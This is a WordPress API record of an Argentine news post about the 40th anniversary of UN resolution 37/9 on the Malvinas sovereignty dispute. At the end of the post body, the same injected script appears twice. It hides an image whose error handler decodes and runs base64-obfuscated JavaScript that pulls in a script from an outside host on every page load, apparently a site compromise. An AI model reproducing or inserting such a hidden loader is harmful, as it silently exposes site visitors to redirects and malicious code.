{"id":1729,"date":"2022-11-04T09:22:24","date_gmt":"2022-11-04T12:22:24","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1729"},"modified":"2025-08-14T00:31:11","modified_gmt":"2025-08-14T03:31:11","slug":"malvinas-la-cancilleria-conmemora-los-40-anos-de-la-resolucion-37-9-de-la-onu-que-insta-al-reino-unido-a-reanudar-las-negociaciones-por-la-soberania","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1729","title":{"rendered":"MALVINAS: LA CANCILLER\u00cdA CONMEMORA LOS 40 A\u00d1OS DE LA RESOLUCI\u00d3N 37\/9 DE LA ONU, QUE INSTA AL REINO UNIDO A \u00abREANUDAR\u00bb LAS NEGOCIACIONES POR LA SOBERAN\u00cdA"},"content":{"rendered":"\n<p>El canciller&nbsp;<strong>Santiago Cafiero<\/strong>&nbsp;conmemorar\u00e1 hoy&nbsp;<strong>viernes 4 de noviembre a las 11 horas<\/strong>,<strong>&nbsp;en el Palacio San Mart\u00edn,<\/strong>&nbsp;el&nbsp;<strong>40\u00b0 aniversario de la adopci\u00f3n por parte de la Asamblea General de las Naciones Unidas (AGNU) de la resoluci\u00f3n 37\/9 sobre la Cuesti\u00f3n de las Islas Malvinas<\/strong>, en un acto junto al Secretario de Malvinas, Ant\u00e1rtida y Atl\u00e1ntico Sur,&nbsp;<strong>Guillermo Carmona<\/strong>, los miembros del&nbsp;<strong>Consejo Nacional Malvinas<\/strong>&nbsp;y funcionarios diplom\u00e1ticos.<\/p>\n\n\n\n<p>Dicha resoluci\u00f3n constituye, junto a la resoluci\u00f3n 2065 del a\u00f1o 1965,&nbsp;<strong>un hito en la diplomacia argentina y la pol\u00edtica de estado relacionada con Malvinas<\/strong>, ya que fue la primera en adoptarse con posterioridad a la finalizaci\u00f3n del conflicto del Atl\u00e1ntico Sur de 1982 y establece claramente que dicho conflicto no modific\u00f3 la naturaleza de la disputa de soberan\u00eda entre la Argentina y el Reino Unido de Gran Breta\u00f1a e Irlanda del Norte sobre las Islas Malvinas, Georgias del Sur, Sandwich del Sur y los espacios mar\u00edtimos circundantes, la cual contin\u00faa pendiente de soluci\u00f3n, y que&nbsp;<strong>la \u00fanica forma de poner fin a este caso especial y particular de descolonizaci\u00f3n contin\u00faa siendo la negociaci\u00f3n entre las dos partes a fin de encontrar una soluci\u00f3n pac\u00edfica y definitiva a la disputa de soberan\u00eda.<\/strong><\/p>\n\n\n\n<p>La resoluci\u00f3n no s\u00f3lo expresa que \u201cel mantenimiento de situaciones coloniales es incompatible con el ideal de paz universal de las Naciones Unidas\u201d, sino tambi\u00e9n en el punto 1&nbsp;<strong>pide a los gobiernos de la Argentina y el Reino Unido de Gran Breta\u00f1a e Irlanda del Norte que \u201creanuden las negociaciones a fin de encontrar una soluci\u00f3n pac\u00edfica a la disputa de Soberan\u00eda sobre dichas islas\u201d.<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El canciller&nbsp;Santiago Cafiero&nbsp;conmemorar\u00e1 hoy&nbsp;viernes 4 de noviembre a las 11 horas,&nbsp;en el Palacio San Mart\u00edn,&nbsp;el&nbsp;40\u00b0 aniversario de la adopci\u00f3n por parte de la Asamblea General de las Naciones Unidas (AGNU) de la resoluci\u00f3n 37\/9 sobre la Cuesti\u00f3n de las Islas Malvinas, en un acto junto al Secretario de Malvinas, Ant\u00e1rtida y Atl\u00e1ntico Sur,&nbsp;Guillermo Carmona, los [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1730,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21],"tags":[],"class_list":{"0":"post-1729","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1729"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1729"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1729\/revisions"}],"predecessor-version":[{"id":7289,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1729\/revisions\/7289"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1730"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1729"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1729"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1729"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}